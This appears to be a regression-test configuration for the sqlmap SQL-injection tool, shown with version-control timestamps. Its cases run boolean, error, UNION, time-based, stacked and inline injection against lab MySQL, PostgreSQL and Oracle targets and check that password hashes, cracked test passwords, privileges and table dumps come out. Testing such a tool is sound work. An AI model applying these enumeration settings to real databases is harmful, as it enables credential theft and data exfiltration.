2010-09-15 17:55:28 +04:00
<?xml version="1.0" encoding="UTF-8"?>
<root >
2012-12-19 20:39:13 +04:00
<vars >
<random value= "random" />
</vars>
2010-09-15 17:55:28 +04:00
<global >
2010-09-27 15:20:48 +04:00
<ignoreProxy value= "True" />
2011-03-24 14:47:01 +03:00
<batch value= "True" />
2013-01-14 05:11:57 +04:00
<flushSession value= "True" />
<disableColoring value= "True" />
2012-12-20 13:42:44 +04:00
<verbose value= "1" />
2013-02-12 17:48:11 +04:00
<parseErrors value= "True" />
2013-01-16 04:45:18 +04:00
<cleanup value= "True" />
2010-09-15 17:55:28 +04:00
</global>
2013-01-23 16:12:30 +04:00
<!-- Preventive cleanup of database management system from sqlmap temporary tables and user - defined functions -->
<case name= "PostgreSQL cleanup from sqlmap temporary tables and user-defined functions (UDFs)" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<tech value= "US" />
2013-01-24 04:55:45 +04:00
<verbose value= "2" />
2013-01-23 16:12:30 +04:00
<cleanup value= "True" />
</switches>
<parse >
<item value= "Title: Generic UNION query (NULL) - 3 columns" />
<item value= "Title: PostgreSQL > 8.1 stacked queries" />
<item value= "r'\[DEBUG\] removing support tables'" console_output= "True" />
<item value= "r'\[DEBUG\] removing UDF 'sys_fileread'" />
<item value= "r'\[DEBUG\] removing UDF 'sys_bineval'" />
<item value= "r'\[DEBUG\] removing UDF 'sys_eval'" />
<item value= "r'\[DEBUG\] removing UDF 'sys_exec'" />
</parse>
</case>
<!-- End of preventive cleanup of database management system from sqlmap temporary tables and user - defined functions -->
2012-12-18 19:59:48 +04:00
<!-- Common enumeration switches across all techniques -->
2012-12-17 17:30:41 +04:00
<case name= "MySQL boolean-based multi-threaded enumeration - all entries" >
2010-09-27 15:20:48 +04:00
<switches >
2011-03-29 10:25:17 +04:00
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
2012-12-17 17:30:41 +04:00
<threads value= "4" />
2011-04-11 01:19:34 +04:00
<tech value= "B" />
2012-12-17 17:30:41 +04:00
<extensiveFp value= "True" />
2011-03-24 15:19:40 +03:00
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
2012-12-17 17:30:41 +04:00
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
2011-03-24 15:19:40 +03:00
<getDbs value= "True" />
<getTables value= "True" />
2012-12-17 17:30:41 +04:00
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
2011-03-24 15:19:40 +03:00
<db value= "testdb" />
2011-03-25 18:37:11 +03:00
<tbl value= "users" />
2012-12-17 17:30:41 +04:00
<excludeSysDbs value= "True" />
</switches>
<parse >
<item value= "Title: AND boolean-based blind - WHERE or HAVING clause" />
<item value= "r'back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0'" />
2012-12-20 17:18:45 +04:00
<item value= "banner: '5.1.66-0+squeeze1'" />
2013-02-12 13:28:15 +04:00
<item value= "current user: 'root@%'" />
2012-12-17 17:30:41 +04:00
<item value= "current database: 'testdb'" />
<item value= "hostname: 'debian" />
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+'debian-sys-maint'@'localhost'.+'root'@''" />
<item value= "r'database management system users password hashes:.+root \[.+password hash: \*00E247AC5F9AF26AE0194B41E1E769DEE1429A29.+clear-text password: testpass'" />
2012-12-17 17:52:00 +04:00
<item value= "r'database management system users privileges:.+debian-sys-maint.+\(administrator\).+root.+\(administrator\).+privilege: SUPER'" />
2013-01-14 14:24:11 +04:00
<item value= "r'database management system users roles:.+debian-sys-maint.+\(administrator\).+root.+\(administrator\).+role: SUPER'" />
2013-01-14 21:30:42 +04:00
<item value= "r'available databases \[.+information_schema.+mysql.+testdb'" />
2012-12-19 16:22:45 +04:00
<item value= "r'Database: testdb.+3 tables.+users'" />
2012-12-17 17:30:41 +04:00
<item value= "r'Database: testdb.+Table: users.+3 columns.+surname.+varchar\(1000\)'" />
<item value= "r'Database: testdb.+Table.+Entries.+users.+5'" />
<item value= "r'Database: testdb.+Table: users.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
<case name= "MySQL error-based multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
2011-03-25 18:37:11 +03:00
<getColumns value= "True" />
2012-12-17 17:30:41 +04:00
<getCount value= "True" />
2011-03-25 18:37:11 +03:00
<dumpTable value= "True" />
2012-12-17 17:30:41 +04:00
<db value= "testdb" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
2013-01-14 03:15:56 +04:00
<answers value= "do you want to perform a dictionary-based attack against retrieved password hashes=N" />
2011-03-24 15:19:40 +03:00
</switches>
2012-12-17 15:29:33 +04:00
<parse >
2012-12-17 17:30:41 +04:00
<item value= "Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause" />
<item value= "r'back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0'" />
2012-12-20 17:18:45 +04:00
<item value= "banner: '5.1.66-0+squeeze1'" />
2013-02-12 13:28:15 +04:00
<item value= "current user: 'root@%'" />
2011-03-24 15:19:40 +03:00
<item value= "current database: 'testdb'" />
2012-12-17 17:30:41 +04:00
<item value= "hostname: 'debian" />
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+'debian-sys-maint'@'localhost'.+'root'@''" />
2013-01-14 03:15:56 +04:00
<item value= "r'database management system users password hashes:.+root \[.+password hash: \*00E247AC5F9AF26AE0194B41E1E769DEE1429A29'" />
2012-12-18 16:07:19 +04:00
<item value= "r'database management system users privileges:.+debian-sys-maint.+\(administrator\).+root.+\(administrator\).+privilege: SUPER'" />
2013-01-14 14:24:11 +04:00
<item value= "r'database management system users roles:.+debian-sys-maint.+\(administrator\).+root.+\(administrator\).+role: SUPER'" />
2013-01-14 21:30:42 +04:00
<item value= "r'available databases \[.+information_schema.+mysql.+testdb'" />
2012-12-19 16:22:45 +04:00
<item value= "r'Database: testdb.+3 tables.+users'" />
2012-12-18 16:07:19 +04:00
<item value= "r'Database: testdb.+Table: users.+3 columns.+surname.+varchar\(1000\)'" />
<item value= "r'Database: testdb.+Table.+Entries.+users.+5'" />
<item value= "r'Database: testdb.+Table: users.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
<case name= "MySQL UNION query multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
2013-01-14 03:15:56 +04:00
<answers value= "do you want to perform a dictionary-based attack against retrieved password hashes=N" />
2012-12-18 16:07:19 +04:00
</switches>
<parse >
<item value= "Title: MySQL UNION query (NULL) - 3 columns" />
<item value= "r'back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0'" />
2012-12-20 17:18:45 +04:00
<item value= "banner: '5.1.66-0+squeeze1'" />
2013-02-12 13:28:15 +04:00
<item value= "current user: 'root@%'" />
2012-12-18 16:07:19 +04:00
<item value= "current database: 'testdb'" />
<item value= "hostname: 'debian" />
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+'debian-sys-maint'@'localhost'.+'root'@''" />
2013-01-14 03:15:56 +04:00
<item value= "r'database management system users password hashes:.+root \[.+password hash: \*00E247AC5F9AF26AE0194B41E1E769DEE1429A29'" />
2012-12-18 16:07:19 +04:00
<item value= "r'database management system users privileges:.+debian-sys-maint.+\(administrator\).+root.+\(administrator\).+privilege: SUPER'" />
2013-01-14 14:24:11 +04:00
<item value= "r'database management system users roles:.+debian-sys-maint.+\(administrator\).+root.+\(administrator\).+role: SUPER'" />
2013-01-14 21:30:42 +04:00
<item value= "r'available databases \[.+information_schema.+mysql.+testdb'" />
2012-12-19 16:22:45 +04:00
<item value= "r'Database: testdb.+3 tables.+users'" />
2012-12-18 16:07:19 +04:00
<item value= "r'Database: testdb.+Table: users.+3 columns.+surname.+varchar\(1000\)'" />
<item value= "r'Database: testdb.+Table.+Entries.+users.+5'" />
<item value= "r'Database: testdb.+Table: users.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
<case name= "MySQL partial UNION query multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int_partialunion.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
2013-01-14 03:15:56 +04:00
<answers value= "do you want to perform a dictionary-based attack against retrieved password hashes=N" />
2012-12-18 16:07:19 +04:00
</switches>
<parse >
<item value= "Title: MySQL UNION query (NULL) - 3 columns" />
<item value= "r'back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0'" />
2012-12-20 17:18:45 +04:00
<item value= "banner: '5.1.66-0+squeeze1'" />
2013-02-12 13:28:15 +04:00
<item value= "current user: 'root@%'" />
2012-12-18 16:07:19 +04:00
<item value= "current database: 'testdb'" />
<item value= "hostname: 'debian" />
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+'debian-sys-maint'@'localhost'.+'root'@''" />
2013-01-14 03:15:56 +04:00
<item value= "r'database management system users password hashes:.+root \[.+password hash: \*00E247AC5F9AF26AE0194B41E1E769DEE1429A29'" />
2012-12-18 16:07:19 +04:00
<item value= "r'database management system users privileges:.+debian-sys-maint.+\(administrator\).+root.+\(administrator\).+privilege: SUPER'" />
2013-01-14 14:24:11 +04:00
<item value= "r'database management system users roles:.+debian-sys-maint.+\(administrator\).+root.+\(administrator\).+role: SUPER'" />
2013-01-14 21:30:42 +04:00
<item value= "r'available databases \[.+information_schema.+mysql.+testdb'" />
2012-12-19 16:22:45 +04:00
<item value= "r'Database: testdb.+3 tables.+users'" />
2012-12-18 16:07:19 +04:00
<item value= "r'Database: testdb.+Table: users.+3 columns.+surname.+varchar\(1000\)'" />
<item value= "r'Database: testdb.+Table.+Entries.+users.+5'" />
<item value= "r'Database: testdb.+Table: users.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
<case name= "MySQL time-based single-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int_nooutput.php?id=1" />
<tech value= "T" />
2012-12-19 21:28:41 +04:00
<timeSec value= "2" />
2012-12-18 16:07:19 +04:00
<getBanner value= "True" />
<isDba value= "True" />
</switches>
<parse >
<item value= "Title: MySQL > 5.0.11 AND time-based blind" />
2012-12-20 17:18:45 +04:00
<item value= "banner: '5.1.66-0+squeeze1'" />
2012-12-18 16:07:19 +04:00
<item value= "current user is DBA: True" />
</parse>
</case>
<case name= "MySQL inline queries multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int_inline.php?id=1" />
<threads value= "4" />
<tech value= "Q" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
2013-01-14 03:15:56 +04:00
<answers value= "do you want to perform a dictionary-based attack against retrieved password hashes=N" />
2012-12-18 16:07:19 +04:00
</switches>
<parse >
<item value= "Title: MySQL inline queries" />
<item value= "r'back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0'" />
2012-12-20 17:18:45 +04:00
<item value= "banner: '5.1.66-0+squeeze1'" />
2013-02-12 13:28:15 +04:00
<item value= "current user: 'root@%'" />
2012-12-18 16:07:19 +04:00
<item value= "current database: 'testdb'" />
<item value= "hostname: 'debian" />
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+'debian-sys-maint'@'localhost'.+'root'@''" />
2013-01-14 03:15:56 +04:00
<item value= "r'database management system users password hashes:.+root \[.+password hash: \*00E247AC5F9AF26AE0194B41E1E769DEE1429A29'" />
2012-12-17 17:52:00 +04:00
<item value= "r'database management system users privileges:.+debian-sys-maint.+\(administrator\).+root.+\(administrator\).+privilege: SUPER'" />
2013-01-14 14:24:11 +04:00
<item value= "r'database management system users roles:.+debian-sys-maint.+\(administrator\).+root.+\(administrator\).+role: SUPER'" />
2013-01-14 21:30:42 +04:00
<item value= "r'available databases \[.+information_schema.+mysql.+testdb'" />
2012-12-19 16:22:45 +04:00
<item value= "r'Database: testdb.+3 tables.+users'" />
2012-12-17 17:30:41 +04:00
<item value= "r'Database: testdb.+Table: users.+3 columns.+surname.+varchar\(1000\)'" />
<item value= "r'Database: testdb.+Table.+Entries.+users.+5'" />
<item value= "r'Database: testdb.+Table: users.+5 entries.+luther.+nameisnull.+'" />
2012-12-17 15:29:33 +04:00
</parse>
2011-03-24 15:19:40 +03:00
</case>
2013-01-14 05:11:57 +04:00
<case name= "PostgreSQL boolean-based multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
</switches>
<parse >
<item value= "Title: AND boolean-based blind - WHERE or HAVING clause" />
<item value= "r'back-end DBMS: active fingerprint: PostgreSQL >= 8.4.0 and < 9.0.0'" />
2013-01-18 03:17:33 +04:00
<item value= "banner: 'PostgreSQL 8.4.13 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Debian 4.4.5-8) 4.4.5, 32-bit'" />
2013-01-14 05:11:57 +04:00
<item value= "current user: 'postgres'" />
<item value= "current database: 'testdb'" />
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+postgres'" />
<item value= "r'database management system users password hashes:.+postgres \[.+password hash: md5d7d880f96044b72d0bba108ace96d1e4.+clear-text password: testpass'" />
<item value= "r'database management system users privileges:.+postgres.+\(administrator\).+privilege: super'" />
<item value= "r'database management system users roles:.+postgres.+\(administrator\).+role: super'" />
<item value= "r'available databases \[.+template0.+template1.+testdb'" />
<item value= "r'Database: public.+1 table.+users'" />
2013-01-14 14:24:11 +04:00
<item value= "r'Database: public.+Table: users.+3 columns.+id.+int4.+surname.+bpchar'" />
2013-01-14 05:11:57 +04:00
<item value= "r'Database: public.+Table.+Entries.+users.+5'" />
<item value= "r'Database: public.+Table: users.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
<case name= "PostgreSQL error-based multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
<answers value= "do you want to perform a dictionary-based attack against retrieved password hashes=N" />
</switches>
<parse >
<item value= "Title: PostgreSQL AND error-based - WHERE or HAVING clause" />
<item value= "r'back-end DBMS: active fingerprint: PostgreSQL >= 8.4.0 and < 9.0.0'" />
2013-01-18 03:17:33 +04:00
<item value= "banner: 'PostgreSQL 8.4.13 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Debian 4.4.5-8) 4.4.5, 32-bit'" />
2013-01-14 05:11:57 +04:00
<item value= "current user: 'postgres'" />
<item value= "current database: 'testdb'" />
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+postgres'" />
<item value= "r'database management system users password hashes:.+postgres \[.+password hash: md5d7d880f96044b72d0bba108ace96d1e4'" />
<item value= "r'database management system users privileges:.+postgres.+\(administrator\).+privilege: super'" />
<item value= "r'database management system users roles:.+postgres.+\(administrator\).+role: super'" />
<item value= "r'available databases \[.+template0.+template1.+testdb'" />
<item value= "r'Database: public.+1 table.+users'" />
2013-01-14 14:24:11 +04:00
<item value= "r'Database: public.+Table: users.+3 columns.+id.+int4.+surname.+bpchar'" />
2013-01-14 05:11:57 +04:00
<item value= "r'Database: public.+Table.+Entries.+users.+5'" />
<item value= "r'Database: public.+Table: users.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
<case name= "PostgreSQL UNION query multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
<answers value= "do you want to perform a dictionary-based attack against retrieved password hashes=N" />
</switches>
<parse >
<item value= "Title: Generic UNION query (NULL) - 3 columns" />
<item value= "r'back-end DBMS: active fingerprint: PostgreSQL >= 8.4.0 and < 9.0.0'" />
2013-01-18 03:17:33 +04:00
<item value= "banner: 'PostgreSQL 8.4.13 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Debian 4.4.5-8) 4.4.5, 32-bit'" />
2013-01-14 05:11:57 +04:00
<item value= "current user: 'postgres'" />
<item value= "current database: 'testdb'" />
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+postgres'" />
<item value= "r'database management system users password hashes:.+postgres \[.+password hash: md5d7d880f96044b72d0bba108ace96d1e4'" />
<item value= "r'database management system users privileges:.+postgres.+\(administrator\).+privilege: super'" />
<item value= "r'database management system users roles:.+postgres.+\(administrator\).+role: super'" />
<item value= "r'available databases \[.+template0.+template1.+testdb'" />
<item value= "r'Database: public.+1 table.+users'" />
2013-01-14 14:24:11 +04:00
<item value= "r'Database: public.+Table: users.+3 columns.+id.+int4.+surname.+bpchar'" />
2013-01-14 05:11:57 +04:00
<item value= "r'Database: public.+Table.+Entries.+users.+5'" />
<item value= "r'Database: public.+Table: users.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
<case name= "PostgreSQL partial UNION query multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int_partialunion.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
<answers value= "do you want to perform a dictionary-based attack against retrieved password hashes=N" />
</switches>
<parse >
<item value= "Title: Generic UNION query (NULL) - 3 columns" />
<item value= "r'back-end DBMS: active fingerprint: PostgreSQL >= 8.4.0 and < 9.0.0'" />
2013-01-18 03:17:33 +04:00
<item value= "banner: 'PostgreSQL 8.4.13 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Debian 4.4.5-8) 4.4.5, 32-bit'" />
2013-01-14 05:11:57 +04:00
<item value= "current user: 'postgres'" />
<item value= "current database: 'testdb'" />
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+postgres'" />
<item value= "r'database management system users password hashes:.+postgres \[.+password hash: md5d7d880f96044b72d0bba108ace96d1e4'" />
<item value= "r'database management system users privileges:.+postgres.+\(administrator\).+privilege: super'" />
<item value= "r'database management system users roles:.+postgres.+\(administrator\).+role: super'" />
<item value= "r'available databases \[.+template0.+template1.+testdb'" />
<item value= "r'Database: public.+1 table.+users'" />
2013-01-14 14:24:11 +04:00
<item value= "r'Database: public.+Table: users.+3 columns.+id.+int4.+surname.+bpchar'" />
2013-01-14 05:11:57 +04:00
<item value= "r'Database: public.+Table.+Entries.+users.+5'" />
<item value= "r'Database: public.+Table: users.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
<case name= "PostgreSQL time-based single-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int_nooutput.php?id=1" />
<tech value= "T" />
<timeSec value= "2" />
<getBanner value= "True" />
<isDba value= "True" />
</switches>
<parse >
<item value= "Title: PostgreSQL > 8.1 AND time-based blind" />
2013-01-18 03:17:33 +04:00
<item value= "banner: 'PostgreSQL 8.4.13 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Debian 4.4.5-8) 4.4.5, 32-bit'" />
2013-01-14 05:11:57 +04:00
<item value= "current user is DBA: True" />
</parse>
</case>
2013-01-23 16:15:20 +04:00
<case name= "PostgreSQL stacked queries single-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int_nooutput.php?id=1" />
<tech value= "S" />
<timeSec value= "2" />
<getBanner value= "True" />
<isDba value= "True" />
</switches>
<parse >
<item value= "Title: PostgreSQL > 8.1 stacked queries" />
<item value= "banner: 'PostgreSQL 8.4.13 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Debian 4.4.5-8) 4.4.5, 32-bit'" />
<item value= "current user is DBA: True" />
</parse>
</case>
2013-01-14 05:11:57 +04:00
<case name= "PostgreSQL inline queries multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int_inline.php?id=1" />
<threads value= "4" />
<tech value= "Q" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<excludeSysDbs value= "True" />
<answers value= "do you want to perform a dictionary-based attack against retrieved password hashes=N" />
</switches>
<parse >
<item value= "Title: PostgreSQL inline queries" />
<item value= "r'back-end DBMS: active fingerprint: PostgreSQL >= 8.4.0 and < 9.0.0'" />
2013-01-18 03:17:33 +04:00
<item value= "banner: 'PostgreSQL 8.4.13 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Debian 4.4.5-8) 4.4.5, 32-bit'" />
2013-01-14 05:11:57 +04:00
<item value= "current user: 'postgres'" />
<item value= "current database: 'testdb'" />
<item value= "current user is DBA: True" />
<item value= "r'database management system users \[.+postgres'" />
<item value= "r'database management system users password hashes:.+postgres \[.+password hash: md5d7d880f96044b72d0bba108ace96d1e4'" />
<item value= "r'database management system users privileges:.+postgres.+\(administrator\).+privilege: super'" />
<item value= "r'database management system users roles:.+postgres.+\(administrator\).+role: super'" />
<item value= "r'available databases \[.+template0.+template1.+testdb'" />
<item value= "r'Database: public.+1 table.+users'" />
2013-01-14 14:24:11 +04:00
<item value= "r'Database: public.+Table: users.+3 columns.+id.+int4.+surname.+bpchar'" />
2013-01-14 05:11:57 +04:00
<item value= "r'Database: public.+Table.+Entries.+users.+5'" />
<item value= "r'Database: public.+Table: users.+5 entries.+luther.+nameisnull.+'" />
</parse>
</case>
2013-01-14 21:30:42 +04:00
<case name= "Oracle boolean-based multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
2013-01-16 19:13:47 +04:00
<db value= "sys" />
2013-01-14 21:30:42 +04:00
<tbl value= "users" />
<excludeSysDbs value= "True" />
</switches>
<parse >
<item value= "Title: AND boolean-based blind - WHERE or HAVING clause" />
<item value= "r'back-end DBMS: active fingerprint: Oracle 10g'" />
2013-01-16 03:59:29 +04:00
<item value= "banner: 'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'" />
2013-01-14 21:30:42 +04:00
<item value= "current user: 'SYS'" />
<item value= "current schema (equivalent to database on Oracle): 'SYS'" />
<item value= "hostname: 'debian" />
<item value= "current user is DBA: True" />
2013-01-18 03:17:33 +04:00
<item value= "r'database management system users \[.+ANONYMOUS.+SYS.+XDB'" />
2013-01-16 19:00:45 +04:00
<item value= "r'database management system users password hashes:.+CTXSYS \[.+password hash: D1D21CA56994CAB6.+clear-text password: ORACLE.+DBSNMP \[.+password hash: E066D214D5421CCC.+clear-text password: DBSNMP.+SYS \[.+password hash: 2D5A0C491B634F1B.+clear-text password: TESTPASS'" />
2013-01-16 19:13:47 +04:00
<item value= "r'database management system users privileges:.+CTXSYS.+ALTER SESSION.+ SYS .+ALTER ANY EVALUATION CONTEXT'" />
<item value= "r'database management system users roles:.+MDSYS.+CONNECT.+SYS \(administrator\).+DBA.+XDBADMIN'" />
<item value= "r'available databases \[.+CTXSYS.+MDSYS.+SYSTEM'" />
<item value= "r'Database: SYS.+Table: USERS.+3 columns.+SURNAME.+VARCHAR2'" />
<item value= "r'Database: SYS.+Table.+Entries.+USERS.+5'" />
<item value= "r'Database: SYS.+Table: USERS.+5 entries.+luther.+nameisnull.+'" />
2013-01-14 21:30:42 +04:00
</parse>
</case>
<case name= "Oracle error-based multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<extensiveFp value= "True" />
<getBanner value= "True" />
<getCurrentUser value= "True" />
<getCurrentDb value= "True" />
<getHostname value= "True" />
<isDba value= "True" />
<getUsers value= "True" />
<getPasswordHashes value= "True" />
<getPrivileges value= "True" />
<getRoles value= "True" />
<getDbs value= "True" />
<getTables value= "True" />
<getColumns value= "True" />
<getCount value= "True" />
<dumpTable value= "True" />
2013-01-16 19:13:47 +04:00
<db value= "sys" />
2013-01-14 21:30:42 +04:00
<tbl value= "users" />
<answers value= "do you want to perform a dictionary-based attack against retrieved password hashes=N" />
</switches>
<parse >
<item value= "Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)" />
<item value= "r'back-end DBMS: active fingerprint: Oracle 10g'" />
2013-01-16 03:59:29 +04:00
<item value= "banner: 'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'" />
2013-01-14 21:30:42 +04:00
<item value= "current user: 'SYS'" />
<item value= "current schema (equivalent to database on Oracle): 'SYS'" />
<item value= "hostname: 'debian" />
<item value= "current user is DBA: True" />
2013-01-18 03:17:33 +04:00
<item value= "r'database management system users \[.+ANONYMOUS.+SYS.+XDB'" />
2013-01-16 19:00:45 +04:00
<item value= "r'database management system users password hashes:.+CTXSYS \[.+password hash: D1D21CA56994CAB6.+DBSNMP \[.+password hash: E066D214D5421CCC.+SYS \[.+password hash: 2D5A0C491B634F1B'" />
2013-01-16 19:13:47 +04:00
<item value= "r'database management system users privileges:.+CTXSYS.+ALTER SESSION.+ SYS .+ALTER ANY EVALUATION CONTEXT'" />
<item value= "r'database management system users roles:.+MDSYS.+CONNECT.+SYS \(administrator\).+DBA.+XDBADMIN'" />
<item value= "r'available databases \[.+CTXSYS.+MDSYS.+SYSTEM'" />
<item value= "r'Database: SYS.+ tables.+USERS'" />
<item value= "r'Database: SYS.+Table: USERS.+3 columns.+SURNAME.+VARCHAR2'" />
<item value= "r'Database: SYS.+Table.+Entries.+USERS.+5'" />
<item value= "r'Database: SYS.+Table: USERS.+5 entries.+luther.+nameisnull.+'" />
2013-01-14 21:30:42 +04:00
</parse>
</case>
<case name= "Oracle UNION query multi-threaded enumeration - all entries" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
